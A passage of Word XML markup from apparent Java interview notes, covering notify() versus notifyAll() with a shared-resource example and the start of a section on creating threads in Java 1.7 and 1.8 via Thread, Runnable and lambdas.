    <w:p w14:paraId="164C12B0"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notify();  // Notifying a single thread to proceed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F75A5A7"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5F60EEF4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BBE713" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579C94F9"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public class Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C02D4"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D547D9"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SharedResource resource = new SharedResource();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51321896" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E61AA5"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Thread incrementThread = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98F1D9"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1582FDBB"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for (int i = 0; i &lt; 10; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4CB7FD"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resource.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B4292"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Thread.sleep(100);  // Simulating work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7375B6D3"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05F3AA0D"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 catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCF6FB0"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FCB145"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10296123"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1E80309E" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D5DA04"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Thread decrementThread = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4519A345"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0399636A"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for (int i = 0; i &lt; 10; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8788B7"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resource.decrement();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20949898"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Thread.sleep(100);  // Simulating work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAEB6F6"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6CAE00F6"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 catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A67D879"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE88495"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6F330DCF"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14A5BB8F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35190C15"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incrementThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF13EC6"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decrementThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E01EDCB"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0C89F8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B15C770" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D90CD15" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If notify() is used in both increment() and decrement() methods, only one thread will be notified at a time. The program could behave inefficiently, as only one of the threads will execute, and others may have to wait longer than necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17187DB7" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If notifyAll() is used instead of notify(), all threads waiting on the monitor will be notified, allowing them to compete for the lock and potentially making the program more responsive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B9C37" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C4AF70" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use notify()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if only one thread should be woken up at a time (e.g., when only one thread can process the task).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398B4423" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use notifyAll()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you have multiple threads waiting, and they all need to be notified to recheck their conditions (e.g., producer-consumer or task assignment scenarios). This is more reliable in many cases, but it might lead to performance overhead in some situations due to the number of threads being notified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E288063" w14:textId="1D772608" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="5BAD2BD3">
          <v:rect id="_x0000_i1819" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2102F844" w14:textId="77777777" w:rsidR="005A01AE" w:rsidRPr="00CE4B95" w:rsidRDefault="005A01AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="264" w:name="_Toc196307744"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create threads using java 1.7 and java 1.8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="264"/>
    </w:p>
    <w:p w14:paraId="6154C3F2" w14:textId="6475D6D8" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Creating threads in Java has been possible since its early versions, but with the introduction of Java 1.7 and Java 1.8, some new features and practices emerged that offer different ways to create threads. Let's explore how to create threads using </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 1.7</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 1.8</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEE0DDC" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Creating Threads in Java 1.7 (Traditional Approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46965676"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In Java 1.7, creating threads was done using two common approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107FC6C9" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Extending the Thread class</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F9BF4D" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1106"/>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You can create a new class that extends the Thread class and override its run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582C9BE0" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implementing the Runnable interface</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4264D557" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1106"/>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This approach involves creating a class that implements the Runnable interface and its run() method. Then, you create a Thread object and pass the Runnable instance to its constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315932D6" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using Thread Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600197A"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class MyThread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDE4014"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D022D"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36595A0E"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System.out.println("Thread running using Thread class");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE09F88"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7054F314" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05FE3BD5"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054A0DB5"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MyThread thread = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC9C7E"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thread.start();  // Starts the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0C490A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745AF878"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB0CC0" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using Runnable Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A251704"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class MyRunnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0B232"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF0F569"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6603C7C3"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System.out.println("Thread running using Runnable interface");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A135F2E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14372B4D" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2384D64E"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1E440E"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MyRunnable myRunnable = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36259F22"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Thread thread = new Thread(myRunnable); // Passing the Runnable object to the Thread constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C56B138"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thread.start(); // Starts the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D99155"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A91125"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560372CF" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Creating Threads in Java 1.8 (Lambda Expressions and Executor Service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D585C25"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With the introduction of </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, we saw the introduction of </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executor Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which made it easier to handle threads. Java 1.8 doesn't change the way threads are created directly, but it provides more concise, flexible, and powerful tools to manage threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3D554" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using Lambda Expressions (Functional Interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ABC1D8"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In Java 1.8, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create and pass Runnable instances more easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16385C81"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public class LambdaThreadExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B417CF6"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A639067"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 Creating thread using lambda expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7B19D"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Runnable task = () -&gt; System.out.println("Thread running using Lambda expression");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455809F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F340A28"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Thread thread = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A769BCB"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thread.start(); // Starts the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03436695"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC31F92"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179EFBC9" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>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Here, Runnable is a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
